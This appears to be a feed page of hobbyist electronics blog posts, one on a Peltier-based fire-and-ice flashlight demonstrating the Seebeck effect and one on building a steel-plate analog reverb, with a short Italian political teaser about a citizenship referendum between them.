[Daniel Salião Ferreira] may or may not be a Game of Thrones fan, but he does have a fun demo of the Seebeck effect in the form of a flashlight powered by fire and ice. The basic idea is to use a thermocouple, but — in this case — he uses a Peltier effect cooler.
The Peltier and Seebeck effects are two sides of the same coin: the Peltier effect creates heating and cooling when current flows through a thermoelectric material. In contrast, the Seebeck effect generates a voltage when there is a temperature gradient. While thermocouples do produce voltage this way, they usually have much lower power output and are useless as heat pumps.
Thermoelectric heat pumps — Peltier devices — use semiconductors, which allow them to reach higher temperature differences when used as a heat pump, and also perform better than a conventional metal thermocouple in reverse operation.
Generating power from waste heat is nothing new. Is it harder to do this with thermocouples? Yes. Yes, it is.
youtube.com/embed/q7bYLyQC27g?…
ANCHE QUELLO SULLA CITTADINANZA È UN REFERENDUM SUL LAVORO
di Maurizio Acerbo - A proposito del quesito sulla cittadinanza c'è chi dice che non riguarda il lavoro. Io credo che si sbagli. Uso per farmi capire un esRifondazione Comunista
Building an Analog Echo Plate
These days, when you think reverb, you probably think about a guitar pedal or a plugin in your audio software. But you can also create reverb with a big metal plate and the right supporting electronics. [Tully] from [The Tul Studio] shows us how.
Basically, if you’ve ever smacked a big sheet of metal and heard the thunderous, rippling sound it makes, you already understand the concept here. To turn it into a studio effect, you use transducers to deliver the sound into the plate of metal, and then microphones to pick it back up again at some other point on the plate. Since the sound takes time to travel through the plate, you get a reverb effect.
[The Tul Studio] used a huge cold-rolled steel plate, standing one meter wide and two meters tall. The plate itself is hung from picture chain, which is strong enough to carry its weight. Old car tweeters are repurposed to act as pickups, while a larger speaker is used to drive sound into the plate. “The key to making it sound not like a tin can is the actual EQ and the electronics,” [Tully] explains, providing resources for this purposes.
We love lots of lovely reverbing things around these parts; oddball delays, too! Video after the break.
youtube.com/embed/Zj0SRZOqyUc?…